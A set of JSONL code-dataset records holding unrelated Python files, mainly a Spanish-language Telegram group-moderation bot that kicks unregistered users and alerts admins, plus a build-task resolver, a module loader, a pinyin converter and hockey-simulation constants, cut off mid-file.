\nsubTour0 = get_subtour(0, graphMatrix)\nprint(subTour0)\nprint_coords_list(subTour0)\n\nallSubTours = get_all_subtours(graphMatrix)\nn = 0\nfor list in allSubTours:\n print(list)\n n += len(list)\n print_coords_list(list)\n\nprint(\"There is :\", len(allSubTours),\" subtours.\")\nprint(\"There is :\", n,\" vertices.\")\n\n# print(tupleSet2tupleList({ (0,1), (1,1), (8,1), (1,8), (2,1), (0,2), (0,0), (7,8), (1,7)}))\nprint(image2matrix(\"Raw/SOAD.jpg\", 5))\n\n\"\"\"\n\n# print(image2matrix(\"Raw/Skull.jpg\", 10))\n","repo_name":"GervaisAzevedo/OptArtImplementations","sub_path":"Chap5/ContinuousLine.py","file_name":"ContinuousLine.py","file_ext":"py","file_size_in_byte":17314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22935067597","text":"import re\nimport time\n\nimport telegram\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, Bot\nfrom telegram.ext.dispatcher import run_async\nfrom telegram.utils.helpers import escape_markdown\n\nimport profdumbledorebot.nanny as nanny\nimport profdumbledorebot.sql.group as group_sql\nimport profdumbledorebot.supportmethods as support\nfrom profdumbledorebot.config import get_config\nfrom profdumbledorebot.model import ValidationRequiered, Houses, Professions\nfrom profdumbledorebot.sql.admin import get_particular_admin, get_admin_from_linked, get_admin, set_admin_settings\nfrom profdumbledorebot.sql.rules import has_rules\nfrom profdumbledorebot.sql.settings import get_join_settings, get_group_settings\nfrom profdumbledorebot.sql.support import are_banned\nfrom profdumbledorebot.sql.user import get_user, is_staff, is_ghost\nfrom profdumbledorebot.sql.usergroup import exists_user_group, set_user_group, join_group, message_counter\nfrom profdumbledorebot.sql.welcome import get_welc_pref\nfrom profdumbledorebot.welcome import send_welcome\nfrom profdumbledorebot.games.utils import game_selection\n\n\n@run_async\ndef joined_chat(bot, update, job_queue):\n chat_id, chat_type, user_id, text, message, message_type = support.extract_update_info(update)\n new_chat_member = message.new_chat_members[0] if message.new_chat_members else None\n\n config = get_config()\n bot_alias = config['telegram']['bot_alias']\n\n if new_chat_member.username == bot_alias:\n if are_banned(user_id, chat_id):\n bot.leaveChat(chat_id=chat_id)\n return\n\n chat_title = message.chat.title\n chat_id = message.chat.id\n group = group_sql.get_real_group(chat_id)\n if group is None:\n group_sql.set_group(chat_id, message.chat.title)\n\n message_text = (\n \"Si necesitais ayuda podéis lanzar chispas rojas c\"\n \"on vuestra varita o utilizando el comando `/help`\"\n \" para conocer todas las funciones. Aseguraos de v\"\n \"er la ayuda para prefectos de los grupos, donde s\"\n \"e explica en detalle todos los pasos que se deben\"\n \" seguir.\".format(escape_markdown(chat_title)))\n\n admin = get_admin(chat_id)\n if admin is not None and admin.admin_bot is True:\n set_admin_settings(chat_id, \"admin_bot\")\n message_text = message_text + \"\\n\\n*Fawkes emprendió el vuelo.*\"\n\n\n bot.sendMessage(\n chat_id=chat_id, \n text=message_text, \n parse_mode=telegram.ParseMode.MARKDOWN)\n\n elif new_chat_member.username != bot_alias:\n chat_id = message.chat.id\n user_id = update.effective_message.new_chat_members[0].id\n\n group = get_join_settings(chat_id)\n if group is not None:\n if group.delete_header:\n support.delete_message(chat_id, message.message_id, bot)\n\n if are_banned(user_id, user_id):\n bot.kickChatMember(chat_id, user_id)\n return\n\n user = get_user(user_id)\n staff = is_staff(user_id)\n ghost = is_ghost(user_id)\n\n if user is None and group.requirment is not ValidationRequiered.NO_VALIDATION.value and staff is False:\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n if group.val_alert is False:\n output = \"👌 Mago sin registrarse expulsado!\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN)\n good_luck(bot, chat_id, message, \"El usuario no está registrado\")\n return\n\n elif ghost is True:\n if group.requirment is ValidationRequiered.GRYFFINDOR.value or ValidationRequiered.HUFFLEPUFF.value or ValidationRequiered.SLYTHERIN.value or ValidationRequiered.RAVENCLAW.value and user.house is group.requirment:\n if group.val_alert is False:\n output = \"👻 Peeves ha entrado en la casa a hacer de las suyas, estad atentos.\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN)\n\n elif group.requirment is ValidationRequiered.GRYFFINDOR.value and user.house is not Houses.GRYFFINDOR.value and staff is False:\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n if group.val_alert is False:\n output = \"👌 Mago infiltrado expulsado!\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN) \n good_luck(bot, chat_id, message, \"El usuario no está registrado\")\n try:\n bot.sendMessage(\n chat_id=user_id, \n text=\"❌ Debes validarte para entrar en este grupo\", \n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception:\n pass\n return\n\n elif group.requirment is ValidationRequiered.HUFFLEPUFF.value and user.house is not Houses.HUFFLEPUFF.value and staff is False:\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n if group.val_alert is False:\n output = \"👌 Mago infiltrado expulsado!\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN) \n good_luck(bot, chat_id, message, \"El usuario no está registrado\")\n try:\n bot.sendMessage(\n chat_id=user_id, \n text=\"❌ Debes validarte para entrar en este grupo\", \n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception:\n pass\n return\n\n elif group.requirment is ValidationRequiered.RAVENCLAW.value and user.house is not Houses.RAVENCLAW.value and staff is False:\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n if group.val_alert is False:\n output = \"👌 Mago infiltrado expulsado!\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN) \n good_luck(bot, chat_id, message, \"El usuario no está registrado\")\n try:\n bot.sendMessage(\n chat_id=user_id, \n text=\"❌ Debes validarte para entrar en este grupo\", \n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception:\n pass\n return\n\n elif group.requirment is ValidationRequiered.SLYTHERIN.value and user.house is not Houses.SLYTHERIN.value and staff is False:\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n if group.val_alert is False:\n output = \"👌 Mago infiltrado expulsado!\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN) \n good_luck(bot, chat_id, message, \"El usuario no está registrado\")\n try:\n bot.sendMessage(\n chat_id=user_id, \n text=\"❌ Debes validarte para entrar en este grupo\", \n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception:\n pass\n return\n \n if group.max_members is not None and group.max_members > 0 and bot.get_chat_members_count(chat_id) >= group.max_members and staff is False:\n if group.val_alert is False:\n output = \"❌ El número máximo de integrantes en el grupo ha sido alcanzado\"\n sent = bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN)\n delete_object = support.DeleteContext(chat_id, sent.message_id)\n job_queue.run_once(\n support.callback_delete, \n 10,\n context=delete_object\n )\n time.sleep(2)\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n return\n\n if (not exists_user_group(user_id, chat_id)):\n set_user_group(user_id, chat_id)\n else:\n join_group(user_id, chat_id)\n\n if has_rules(chat_id) and staff is False:\n bot.restrict_chat_member(\n chat_id,\n user_id,\n until_date=0,\n can_send_messages=False,\n can_send_media_messages=False,\n can_send_other_messages=False,\n can_add_web_page_previews=False)\n\n if get_welc_pref(chat_id):\n sent = send_welcome(bot, update)\n if sent is not None and group.delete_cooldown is not None and group.delete_cooldown > 0:\n delete_object = support.DeleteContext(chat_id, sent.message_id)\n job_queue.run_once(\n support.callback_delete, \n group.delete_cooldown,\n context=delete_object\n )\n '''\n if group.val_alert and (user is None or user.level is None):\n sent = bot.sendMessage(\n chat_id=chat_id,\n text=\"\",\n parse_mode=telegram.ParseMode.MARKDOWN\n )\n if sent is not None:\n delete_object = support.DeleteContext(chat_id, sent.message_id)\n job_queue.run_once(\n support.callback_delete, \n group.delete_cooldown or 60,\n context=delete_object\n )\n '''\n ladmin = get_particular_admin(chat_id)\n if ladmin is not None and ladmin.welcome:\n admin = get_admin_from_linked(chat_id)\n buttons = [\n [InlineKeyboardButton(text=\"🚫 Ban\", callback_data=f\"adm_ban_{user_id}\"),\n InlineKeyboardButton(text=\"❌ Kick\", callback_data=f\"adm_kick_{user_id}\"),\n InlineKeyboardButton(text=\"⚠️ Warn\", callback_data=f\"adm_warn_{user_id}\")]\n ]\n if admin is not None and admin.welcome and admin.admin_bot:\n config = get_config()\n adm_bot = Bot(token=config[\"telegram\"][\"admin_token\"])\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} ha entrado en el grupo\").format(message.chat.title, replace_pogo)\n adm_bot.sendMessage(\n chat_id=admin.id,\n text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(buttons)\n )\n elif admin is not None and admin.welcome :\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} ha entrado en el grupo\").format(message.chat.title, replace_pogo)\n bot.sendMessage(\n chat_id=admin.id,\n text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(buttons)\n )\n\n\ndef good_luck(bot, chat_id, message, text):\n ladmin = get_particular_admin(chat_id)\n user_id = message.from_user.id\n if ladmin is not None and ladmin.welcome:\n admin = get_admin_from_linked(chat_id)\n if admin is not None and admin.welcome and admin.admin_bot:\n config = get_config()\n adm_bot = Bot(token=config[\"telegram\"][\"admin_token\"])\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} {}\").format(message.chat.title, replace_pogo, text)\n adm_bot.sendMessage(chat_id=admin.id, text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN)\n elif admin is not None and admin.welcome:\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} {}\").format(message.chat.title, replace_pogo, text)\n bot.sendMessage(chat_id=admin.id, text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n\n@run_async\ndef process_group_message(bot, update, job_queue):\n chat_id, chat_type, user_id, text, message, message_type = support.extract_update_info(update)\n msg = update.effective_message\n \n if are_banned(user_id, chat_id):\n return\n \n group = group_sql.get_group(chat_id)\n if group is None:\n group_sql.set_group(chat_id, message.chat.title)\n if not exists_user_group(user_id, chat_id):\n set_user_group(user_id, chat_id)\n \n message_counter(user_id, chat_id)\n if get_group_settings(chat_id).games == True and (chat_type == 'supergroup' or chat_type == 'group'):\n game_selection(bot, update)\n\n if text is None or msg.photo is None:\n if msg and msg.document:\n nanny.process_gif(bot, update, job_queue)\n return\n elif msg and msg.contact:\n nanny.process_contact(bot, update, job_queue)\n return\n elif msg and msg.game:\n nanny.process_game(bot, update, job_queue)\n return\n elif msg and msg.location or msg.venue:\n nanny.process_ubi(bot, update, job_queue)\n return\n elif msg and msg.photo:\n nanny.process_pic(bot, update, job_queue)\n return\n elif msg and msg.sticker:\n nanny.process_sticker(bot, update, job_queue)\n return\n elif msg and msg.voice or msg.audio:\n nanny.process_voice(bot, update, job_queue)\n return\n elif msg and msg.video or msg.video_note:\n nanny.process_video(bot, update, job_queue)\n return\n\n if msg and msg.entities and nanny.process_url(bot, update, job_queue):\n return\n\n if nanny.nanny_text(bot, user_id, chat_id, message, job_queue):\n return\n\n if text is not None and re.search(\"@admin(?!\\w)\", text) is not None:\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n\n chat_text = support.message_url(message, message.message_id, message.chat.title)\n\n message_text=(\"ℹ️ {}\\n👤 {} ha enviado una alerta a los administradores\\n\\nMensaje: {}\").format(\n chat_text,\n replace_pogo,\n text\n )\n for admin in bot.get_chat_administrators(chat_id):\n user = get_user(admin.user.id)\n if user is not None and user.alerts:\n bot.sendMessage(\n chat_id=admin.user.id,\n text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN,\n disable_web_page_preview=True\n )\n ladmin = get_particular_admin(chat_id)\n if ladmin is not None and ladmin.admin:\n admin = get_admin_from_linked(chat_id)\n if admin is not None and admin.admin and admin.admin_bot:\n config = get_config()\n adm_bot = Bot(token=config[\"telegram\"][\"admin_token\"])\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} {}\").format(chat_text, replace_pogo, text)\n adm_bot.sendMessage(chat_id=admin.id, text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN, disable_web_page_preview=True)\n elif admin is not None and admin.admin:\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} {}\").format(chat_text, replace_pogo, text)\n bot.sendMessage(chat_id=admin.id, text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN, disable_web_page_preview=True)\n'''\n if text and len(text) < 31:\n commands = get_commands(chat_id)\n if commands is None:\n return\n for command in commands:\n logging.debug(\"%s %s\", text, command)\n if distance(text.lower(), command.command.lower()) < 1:\n logging.debug(\"%s %s\", text, command.command)\n ENUM_FUNC_MAP = {\n Types.TEXT.value: bot.sendMessage,\n Types.BUTTON_TEXT.value: bot.sendMessage,\n Types.STICKER.value: bot.sendSticker,\n Types.DOCUMENT.value: bot.sendDocument,\n Types.PHOTO.value: bot.sendPhoto,\n Types.AUDIO.value: bot.sendAudio,\n Types.VOICE.value: bot.sendVoice,\n Types.VIDEO.value: bot.sendVideo\n }\n if command.command_type != Types.TEXT and command.command_type != Types.BUTTON_TEXT:\n ENUM_FUNC_MAP[command.command_type](chat_id, command.media)\n return\n\n if command.command_type == Types.BUTTON_TEXT:\n buttons = get_cmd_buttons(chat_id)\n keyb = build_keyboard(buttons)\n keyboard = InlineKeyboardMarkup(keyb)\n else:\n keyboard = None\n try:\n msg = update.effective_message.reply_text(\n command.media,\n reply_markup=keyboard,\n parse_mode=telegram.ParseMode.MARKDOWN,\n disable_web_page_preview=True, \n disable_notification=False\n )\n\n except IndexError:\n msg = update.effective_message.reply_text(\n markdown_parser(\n \"\\nBip bop bip: El mensaje tiene errores de\"\n \"Markdown, revisalo y configuralo de nuevo.\"),\n parse_mode=telegram.ParseMode.MARKDOWN)\n except KeyError:\n msg = update.effective_message.reply_text(\n markdown_parser(\n \"\\nBip bop bip: El mensaje tiene errores con\"\n \"las llaves, revisalo y configuralo de nuevo.\"),\n parse_mode=telegram.ParseMode.MARKDOWN)\n return\n'''\n\n\ndef send_alert(bot, chat_id, user_id):\n button_list = [[\n InlineKeyboardButton(text=\"Empezar!\", url=\"https://t.me/ProfDumbledoreBot\")\n ]]\n reply_markup = InlineKeyboardMarkup(button_list)\n sent_message = bot.sendMessage(\n chat_id=chat_id,\n text=(\n \"¡Hola mago/a!\\n\\nPara permanecer en este grupo, debes registra\"\n \"rte conmigo: @ProfDumbledoreBot.\\nPara hacerlo, pulsa *Empezar*, inicia el\"\n \" chat privado y sigue los pasos.\"\n ),\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=reply_markup\n )\n return sent_message\n\n\n","repo_name":"pikaping/ProfesorDumbledoreBot","sub_path":"profdumbledorebot/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":20353,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"27681072335","text":"from typing import List, Dict, Set\nfrom exceptions import UndefinedDependencyException, UndefinedBuildException\n\n\ndef form_map(data: List[Dict]):\n result = dict()\n for task in data:\n result[task.get('name')] = task.get('tasks')\n return result\n\n\ndef add_task_to_list(result_list: List, result_set: Set, task: str):\n if task not in result_set:\n result_set.add(task)\n result_list.append(task)\n\n\ndef form_build_tasks(task_data: Dict[str, List[str]], build_name: str, build_data: Dict[str, List[str]]):\n result_list = []\n result_set = set()\n build_tasks = build_data.get(build_name)\n if build_tasks is None:\n raise UndefinedBuildException(f'Билд {build_name} не обнаружен')\n for task in build_tasks:\n if task not in task_data:\n raise UndefinedDependencyException(f'Билд {build_name}: '\n f'обнаружена несуществующая таска {task}')\n add_task_to_list(result_list, result_set, task)\n for dep in task_data.get(task):\n add_task_to_list(result_list, result_set, dep)\n return {\n 'name': build_name,\n 'tasks': result_list,\n }\n\n","repo_name":"Valll-v/Saber-Interactive-test-task","sub_path":"build_worker.py","file_name":"build_worker.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27518795396","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport importlib\nimport logging\nfrom typing import Dict, List, Union\n\n###############################################################################\n\nlog = logging.getLogger(__name__)\n\n###############################################################################\n\n\ndef load_custom_object(\n module_path: Union[str, List[str]], object_name: str, object_kwargs: Dict\n) -> object:\n \"\"\"\n Load a custom object with kwargs.\n\n Parameters\n ----------\n module_path: Union[str, List[str]]\n Python module path or list of path parts to a custom module.\n Ex: \"cptools.pipeline\"\n object_name: str\n Name of the object to retrieve from the module. Ex: \"Pipeline\"\n object_kwargs: Dict\n Any kwargs to pass to the object.\n\n Returns\n -------\n obj: object\n The initialized object.\n \"\"\"\n # Convert module path to string\n if isinstance(module_path, list):\n module_path = \".\".join(module_path)\n\n # Load target module\n mod = importlib.import_module(module_path)\n obj = getattr(mod, object_name)\n obj = obj(**object_kwargs)\n\n # Log\n log.debug(f\"Using object: {type(obj)}\")\n\n return obj\n","repo_name":"CouncilDataProject/cdptools_v2","sub_path":"cdptools/dev_utils/load_custom_object.py","file_name":"load_custom_object.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"12798719961","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n Author:cleverdeng\n E-mail:clverdeng@gmail.com\n\"\"\"\n\n__version__ = '0.9'\n__all__ = [\"PinYin\"]\n\nimport os.path\n\n\nclass PinYin(object):\n def __init__(self, dict_file='word.data'):\n self.word_dict = {}\n self.dict_file = dict_file\n\n\n def load_word(self):\n if not os.path.exists(self.dict_file):\n raise IOError(\"NotFoundFile\")\n\n f_obj = open(self.dict_file, \"r\")\n for f_line in f_obj.readlines():\n try:\n line = f_line.split(' ')\n self.word_dict[line[0]] = line[1]\n except:\n line = f_line.split(' ')\n self.word_dict[line[0]] = line[1]\n f_obj.close()\n\n\n def hanzi2pinyin(self, string=\"\"):\n result = []\n if not isinstance(string, type('s')):\n string = string.decode(\"utf-8\")\n \n for char in string:\n key = '%X' % ord(char)\n result.append(self.word_dict.get(key, char).split()[0][:-1].lower())\n\n return result\n\n\n def hanzi2pinyin_split(self, string=\"\", split=\"\"):\n result = self.hanzi2pinyin(string=string)\n if split == \"\":\n return result\n else:\n return split.join(result)\n\n\nconverter = PinYin()\nconverter.load_word()\n\ninput = open(\"tar.txt\", \"r\")\noutput = open(\"py.txt\", \"w\")\nfor line in input:\n line = line[:-1]\n output.write(converter.hanzi2pinyin_split(string=line, split=\" \") + \"\\n\")\n\ninput.close()\noutput.close()\n","repo_name":"alonewithyou/Pinyin-Chinese","sub_path":"prepare/produce.py","file_name":"produce.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"6399083449","text":"# Gameplay defines\nglobal TOTAL_POINTS_PER_GAME\nglobal TOTAL_GOALS_PER_GAME\nglobal TOTAL_GOALS_PER_GAME_ES\nglobal TOTAL_GOALS_PER_GAME_PP\nglobal TOTAL_GOALS_PER_GAME_PK\nglobal SCF_SF_FACTOR\nglobal PROBABILITY_FOR_OT\nglobal CURRENT_TEAM\nglobal OPPONENT_TEAM\nglobal SIMULATION_LIGHT\nglobal SIMULATION_EXT\nglobal HT_ADVANTAGE\nglobal AT_ADVANTAGE\nglobal WS_DEF\nglobal WS_CEN\nglobal WS_WNG\nglobal WS_FWD\nTOTAL_POINTS_PER_GAME = 2.1066089693154995\nTOTAL_GOALS_PER_GAME = 5.209284028324154\nTOTAL_GOALS_PER_GAME_ES = 0\nTOTAL_GOALS_PER_GAME_PP = 0\nTOTAL_GOALS_PER_GAME_PK = 0\nSCF_SF_FACTOR = 4.292072174177282\nPROBABILITY_FOR_OT = 0.10660896931549961\nCURRENT_TEAM = ['ht','at']\nOPPONENT_TEAM = ['at','ht']\nSIMULATION_LIGHT = 0\nSIMULATION_EXT = 1\nHT_ADVANTAGE = 1.1878\nAT_ADVANTAGE = 1/HT_ADVANTAGE\nWS_DEF = [1,0.75,0.15] # weighted scale suggestion for defenders\nWS_CEN = [1,1,0.5] # weighted scale suggestion for centers\nWS_WNG = [0.75,1,1] # weighted scale suggestion for wingers\nWS_FWD = [1.25,1.25,0.5]\n\nglobal STAT_ES\nglobal STAT_PP\nglobal STAT_PK\nglobal STAT_INDEX\nSTAT_ES = 0\nSTAT_PP = 1\nSTAT_PK = 2\nSTAT_INDEX = [STAT_ES,STAT_PP,STAT_PK]\n\n\nglobal SKATER_BIO_BIT\nglobal SKATER_ES_BIT\nglobal SKATER_PP_BIT\nglobal SKATER_PK_BIT\nglobal SKATER_ON_ICE_BIT\nglobal SKATER_RELATIVE_BIT\nglobal GOALIE_ES_BIT\nglobal GOALIE_PP_BIT\nglobal GOALIE_PK_BIT\nglobal TEAM_ES_BIT\nglobal TEAM_PP_BIT\nglobal TEAM_PK_BIT\nglobal TEAM_HOME_BIT\nglobal TEAM_AWAY_BIT\nglobal UNAVAILABLE_PLAYERS_BIT\nglobal DATABASE_BIT_REGISTER\nglobal CONNECTION_TIMEOUT\n\nSKATER_BIO_BIT = 0\nSKATER_ES_BIT = 1\nSKATER_PP_BIT = 2\nSKATER_PK_BIT = 3\nSKATER_ON_ICE_BIT = 4\nSKATER_RELATIVE_BIT = 5\nGOALIE_ES_BIT = 6\nGOALIE_PP_BIT = 7\nGOALIE_PK_BIT = 8\nTEAM_ES_BIT = 9\nTEAM_PP_BIT = 10\nTEAM_PK_BIT = 11\nTEAM_HOME_BIT = 12\nTEAM_AWAY_BIT = 13\nUNAVAILABLE_PLAYERS_BIT = 14\nDATABASE_BIT_REGISTER = 15*[True]\nCONNECTION_TIMEOUT = 60\t\t\t\t\t\t# Connection will timeout after 60 seconds\n\nglobal GAMEPLAY_ES\nglobal GAMEPLAY_PP_HT\nglobal GAMEPLAY_PP_AT\nglobal GAMEPLAY_PK_HT\nglobal GAMEPLAY_PK_AT\nglobal NO_GOALIE_HT\nglobal NO_GOALIE_AT\nGAMEPLAY_ES = 0\nGAMEPLAY_PP_HT = 1\nGAMEPLAY_PP_AT = 2\nGAMEPLAY_PK_HT = 2\nGAMEPLAY_PK_AT = 1\nNO_GOALIE_HT = 3\nNO_GOALIE_AT = 4\n\nglobal ACTIVE_SKATERS\nglobal ACTIVE_GOALIES\nglobal ACTIVE_PLAYERS\nglobal ACTIVE_TEAMS\nACTIVE_SKATERS = set()\nACTIVE_GOALIES = set()\nACTIVE_PLAYERS = set()\nACTIVE_TEAMS = ['ANA','ARI','BOS','BUF','CAR','CBJ','CGY','CHI','COL','DAL','DET','EDM','FLA','LAK','MIN','MTL','NJD','NSH','NYI','NYR','OTT','PHI','PIT','SJS','STL','TBL','TOR','VAN','VGK','WPG','WSH']\n'''\nSkater Bio-DB from naturalstattrick.com\n,\"Player\",\"Team\",\"Position\",\"Age\",\"Date of Birth\",\n\"Birth City\",\"Birth State/Province\",\"Birth Country\",\n\"Nationality\",\"Height (in)\",\"Weight (lbs)\",\"Draft Year\",\n\"Draft Team\",\"Draft Round\",\"Round Pick\",\"Overall Draft Position\"\n'''\nglobal SKATER_DB_BIO_NAME\nglobal SKATER_DB_BIO_TEAM_ID\nglobal SKATER_DB_BIO_POSITION\nglobal SKATER_DB_BIO_AGE\nglobal SKATER_DB_BIO_DOB\nglobal SKATER_DB_BIO_HEIGHT\nglobal SKATER_DB_BIO_WEIGHT\nglobal SKATER_DB_BIO_DRAFT_YEAR\nglobal SKATER_DB_BIO_DRAFT_TEAM\nglobal SKATER_DB_BIO_DRAFT_ROUND\nglobal SKATER_DB_BIO_ROUND_PICK\nglobal SKATER_DB_BIO_TOTAL_DRAFT_POS\nSKATER_DB_BIO_NAME = 1\nSKATER_DB_BIO_TEAM_ID = 2\nSKATER_DB_BIO_POSITION = 3\nSKATER_DB_BIO_AGE = 4\nSKATER_DB_BIO_DOB = 5\nSKATER_DB_BIO_HEIGHT = 10\nSKATER_DB_BIO_WEIGHT = 11\nSKATER_DB_BIO_DRAFT_YEAR = 12\nSKATER_DB_BIO_DRAFT_TEAM = 13\nSKATER_DB_BIO_DRAFT_ROUND = 14\nSKATER_DB_BIO_ROUND_PICK = 15\nSKATER_DB_BIO_TOTAL_DRAFT_POS = 16\nSKATER_DB_BIO_LENGTH = 17\n\n'''\nSkater Individual-DB, ES, from naturalstattrick.com\n'''\nglobal SKATER_DB_IND_TEAM_ID\nglobal SKATER_DB_IND_TOI\nglobal SKATER_DB_IND_GOALS\nglobal SKATER_DB_IND_ASSIST\nglobal SKATER_DB_IND_FIRST_ASSIST\nglobal SKATER_DB_IND_SECOND_ASSIST\nglobal SKATER_DB_IND_SF\nglobal SKATER_DB_IND_SH_PCG\nglobal SKATER_DB_IND_IXG\nglobal SKATER_DB_IND_ICF\nglobal SKATER_DB_IND_IFF\nglobal SKATER_DB_IND_ISCF\nglobal SKATER_DB_IND_IHDCF\nglobal SKATER_DB_IND_RUSH_ATTEMPTS\nglobal SKATER_DB_IND_REBOUNDS_CREATED\nglobal SKATER_DB_IND_TOTAL_PENALTIES\nglobal SKATER_DB_IND_MINOR\nglobal SKATER_DB_IND_MAJOR\nglobal SKATER_DB_IND_MISCONDUCT\nglobal SKATER_DB_IND_PENALTIES_DRAWN\nglobal SKATER_DB_IND_GIVEAWAYS\nglobal SKATER_DB_IND_TAKEAWAYS\nglobal SKATER_DB_IND_HITS\nglobal SKATER_DB_IND_HITS_TAKEN\nglobal SKATER_DB_IND_SHOTS_BLOCKED\nglobal SKATER_DB_IND_FACEOFFS_WON\nglobal SKATER_DB_IND_FACEOFFS_LOST\nglobal SKATER_DB_IND_FACEOFFS_WON_PCG\nSKATER_DB_IND_TEAM_ID = 2\nSKATER_DB_IND_TOI = 5\nSKATER_DB_IND_GOALS = 6\nSKATER_DB_IND_ASSIST = 7\nSKATER_DB_IND_FIRST_ASSIST = 8\nSKATER_DB_IND_SECOND_ASSIST = 9\nSKATER_DB_IND_SF = 12\nSKATER_DB_IND_SH_PCG = 13\nSKATER_DB_IND_IXG = 14\nSKATER_DB_IND_ICF = 15\nSKATER_DB_IND_IFF = 16\nSKATER_DB_IND_ISCF = 17\nSKATER_DB_IND_IHDCF = 18\nSKATER_DB_IND_RUSH_ATTEMPTS = 19\nSKATER_DB_IND_REBOUNDS_CREATED = 20\nSKATER_DB_IND_PIM = 21\nSKATER_DB_IND_TOTAL_PENALTIES = 22\nSKATER_DB_IND_MINOR = 23\nSKATER_DB_IND_MAJOR = 24\nSKATER_DB_IND_MISCONDUCT = 25\nSKATER_DB_IND_PENALTIES_DRAWN = 26\nSKATER_DB_IND_GIVEAWAYS = 27\nSKATER_DB_IND_TAKEAWAYS = 28\nSKATER_DB_IND_HITS = 29\nSKATER_DB_IND_HITS_TAKEN = 30\nSKATER_DB_IND_SHOTS_BLOCKED = 31\nSKATER_DB_IND_FACEOFFS_WON = 32\nSKATER_DB_IND_FACEOFFS_LOST = 33\nSKATER_DB_IND_FACEOFFS_WON_PCG = 34\nSKATER_DB_IND_LENGTH = 35\n\n'''\nSkater OnIce-DB from naturalstattrick.com\n'''\nglobal SKATER_DB_ON_ICE_TOI\nglobal SKATER_DB_ON_ICE_GP\nglobal SKATER_DB_ON_ICE_CF\nglobal SKATER_DB_ON_ICE_CA\nglobal SKATER_DB_ON_ICE_CF_PERCENT\nglobal SKATER_DB_ON_ICE_FF\nglobal SKATER_DB_ON_ICE_FA\nglobal SKATER_DB_ON_ICE_FF_PERCENT\nglobal SKATER_DB_ON_ICE_SF\nglobal SKATER_DB_ON_ICE_SA\nglobal SKATER_DB_ON_ICE_SF_PERCENT\nglobal SKATER_DB_ON_ICE_GF\nglobal SKATER_DB_ON_ICE_GA\nglobal SKATER_DB_ON_ICE_GF_PERCENT\nglobal SKATER_DB_ON_ICE_xGF\nglobal SKATER_DB_ON_ICE_xGA\nglobal SKATER_DB_ON_ICE_xGF_PERCENT\nglobal SKATER_DB_ON_ICE_SCF\nglobal SKATER_DB_ON_ICE_SCA\nglobal SKATER_DB_ON_ICE_SCF_PERCENT\nglobal SKATER_DB_ON_ICE_HDCF\nglobal SKATER_DB_ON_ICE_HDCA\nglobal SKATER_DB_ON_ICE_HDCF_PERCENT\nglobal SKATER_DB_ON_ICE_OZS\nglobal SKATER_DB_ON_ICE_NZS\nglobal SKATER_DB_ON_ICE_DZS\nglobal SKATER_DB_ON_ICE_OZS_PERCENT\nglobal SKATER_DB_ON_ICE_OZFO\nglobal SKATER_DB_ON_ICE_NZFO\nglobal SKATER_DB_ON_ICE_DZFO\nglobal SKATER_DB_ON_ICE_OZFO_PERCENT\nSKATER_DB_ON_ICE_GP = 4\nSKATER_DB_ON_ICE_TOI_UL = 5\nSKATER_DB_ON_ICE_CF = 6\nSKATER_DB_ON_ICE_CA = 